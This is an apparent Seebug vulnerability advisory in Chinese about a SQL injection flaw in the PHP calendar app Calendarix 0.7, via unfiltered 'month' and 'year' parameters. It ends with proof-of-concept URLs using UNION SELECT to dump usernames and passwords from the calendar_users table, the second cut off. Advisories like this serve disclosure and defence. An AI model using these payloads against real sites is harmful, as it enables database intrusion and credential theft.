Lucene search

K
seebugRootSSV:1919
HistoryJun 26, 2007 - 12:00 a.m.

Calendarix SQL注入漏洞

2007-06-2600:00:00
Root
www.seebug.org
37

Calendarix是一款基于PHP的WEB应用程序。

Calendarix不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。

问题是由于’index.php’脚本对用户提交的’month’和’year’参数缺少过滤,提交恶意SQL查询作为参数数据,可导致应用程序处理时更改原来的SQL逻辑,攻击者可以获得敏感信息或者操作数据库。

Calendarix 0.7.20070307
目前没有解决方案提供:

<a href=“http://www.calendarix.com/” target=“_blank”>http://www.calendarix.com/</a>


                                                http://www.example.com/calendar.php?month='&nbsp;UNION&nbsp;SELECT&nbsp;1,&nbsp;1,&nbsp;`password`,&nbsp;`username`&nbsp;,1&nbsp;FROM&nbsp;`calendar_users`&nbsp;%23

http://www.example.com/calendar.php?month=&amp;year='&nbsp;UNION&nbsp;